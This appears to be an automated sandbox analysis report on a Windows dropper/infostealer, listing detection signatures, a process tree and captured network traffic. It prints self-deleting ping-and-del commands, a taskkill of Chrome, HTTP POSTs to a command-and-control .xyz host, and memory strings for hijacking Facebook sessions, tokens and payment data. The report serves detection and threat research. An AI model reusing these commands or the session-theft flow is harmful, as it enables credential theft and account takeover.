
Analysis Report fnhcdXEfus.exe

Overview

General Information

Sample Name: fnhcdXEfus.exe
Analysis ID: 346325
MD5: 18169f98e39ae228d131aec477c8a2e9
SHA1: c6c6eacaa8df6ea5251c7f26a2d9ec4317092e6a
SHA256: 344b323928698d9982c7577e5405a1cb587c45f94a0f6745827648381397f255
Tags: Mingloa

Detection

Score: 90
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

Startup

  • System is w10x64
  • fnhcdXEfus.exe (PID: 5976 cmdline: 'C:\Users\user\Desktop\fnhcdXEfus.exe' MD5: 18169F98E39AE228D131AEC477C8A2E9)
    • msiexec.exe (PID: 4084 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • 63C4F3D9EA0CC861.exe (PID: 3664 cmdline: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 0011 installp2 MD5: 18169F98E39AE228D131AEC477C8A2E9)
      • 1612045890161.exe (PID: 5440 cmdline: 'C:\Users\user\AppData\Roaming\1612045890161.exe' /sjson 'C:\Users\user\AppData\Roaming\1612045890161.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)
      • ThunderFW.exe (PID: 3148 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)
      • cmd.exe (PID: 412 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 6268 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • 63C4F3D9EA0CC861.exe (PID: 6004 cmdline: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 200 installp2 MD5: 18169F98E39AE228D131AEC477C8A2E9)
      • cmd.exe (PID: 1240 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 6164 cmdline: taskkill /f /im chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • cmd.exe (PID: 6328 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 6372 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • cmd.exe (PID: 5776 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\fnhcdXEfus.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 5748 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
  • msiexec.exe (PID: 3492 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 72A2D95648135F8DB654A3D18B753FD0 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.274583056.00000000026D0000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000003.00000002.365832214.00000000026F0000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000000.00000002.246525217.0000000002810000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.fnhcdXEfus.exe.2810000.5.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
3.2.63C4F3D9EA0CC861.exe.26f0000.2.raw.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.63C4F3D9EA0CC861.exe.26d0000.5.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.63C4F3D9EA0CC861.exe.10000000.7.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
3.2.63C4F3D9EA0CC861.exe.10000000.7.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Metadefender: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | ReversingLabs: Detection: 82%
Multi AV Scanner detection for submitted file
Source: fnhcdXEfus.exe | Virustotal: Detection: 73%
Source: fnhcdXEfus.exe | Metadefender: Detection: 29%
Source: fnhcdXEfus.exe | ReversingLabs: Detection: 82%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: fnhcdXEfus.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

Compliance:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Unpacked PE file: 0.2.fnhcdXEfus.exe.2810000.5.unpack
Uses 32bit PE files
Source: fnhcdXEfus.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses new MSVCR Dlls
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: fnhcdXEfus.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.3.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1612045890161.exe, 0000000B.00000000.258604279.000000000040F000.00000002.00020000.sdmp, 1612045890161.exe.3.dr
Source: Binary string: atl71.pdbT source: atl71.dll.3.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.3.dr
Source: Binary string: atl71.pdb source: atl71.dll.3.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.3.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.3.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.3.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.3.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.3.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.3.dr
Source: Binary string: C:\CodeBases\isdev\redist\Language Independent\i386\setup.pdb source: fnhcdXEfus.exe
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001E.00000002.347950817.00000000002BC000.00000002.00020000.sdmp, ThunderFW.exe.3.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.3.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.3.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI6DDB.tmp.1.dr
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: z:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: x:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: v:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: t:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: r:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: p:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: n:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: l:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: j:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: h:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: f:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: b:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: y:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: w:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: u:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: s:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: q:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: o:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: m:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: k:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: i:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: g:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: e:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: a:
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0042A5EF __EH_prolog3_GS,_memset,GetTempPathW,FindFirstFileW,CompareFileTime,DeleteFileW,FindNextFileW,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\

Networking:

Uses ping.exe to check the status of other devices and networks
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global traffic | HTTP traffic detected: GET /info_old/ddd HTTP/1.1 Host: C8DD8AE6DC4DC644.xyz Accept: */*
Source: global traffic | HTTP traffic detected: POST //fine/send HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 84 Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 93 Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 93 Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 93 Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/e HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 677 Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/g HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 1405 Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: GET /info_old/r HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: GET /info_old/r HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: GET /info_old/ddd HTTP/1.1 Host: C8DD8AE6DC4DC644.xyz Accept: */*
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: _time":"13245951499607797","lastpingday":"13245947458072931","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: 
